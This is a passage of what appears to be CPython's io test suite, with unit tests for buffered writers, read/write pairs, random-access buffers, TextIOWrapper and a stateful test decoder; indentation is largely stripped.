self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
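    # An illustrative sketch (not one of the original tests): caller code writing to a
    # non-blocking buffered stream typically resumes from e.characters_written, e.g.:
    @staticmethod
    def _write_all_nonblocking(bufio, data, wait_for_writable):
        written = 0
        while written < len(data):
            try:
                written += bufio.write(data[written:])
            except BlockingIOError as e:
                written += e.characters_written
                wait_for_writable()  # caller-supplied back-off, e.g. select() on the fd
        return written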
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
        # The Python version has __del__, so it ends up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
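# Shared helper for the test_flush_and_* variants below: interleaves writes
# with *read_func* and checks that flush() keeps the position and resets the
# read buffer.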
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are period-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
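# Consume the buffered word: update I or O for the control words, otherwise
# emit the word padded/truncated to length O and terminated with a period.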
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
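# testdata mixes \r, \n and \r\n endings; normalized is the universal-newline
# decoding expected from it.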
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
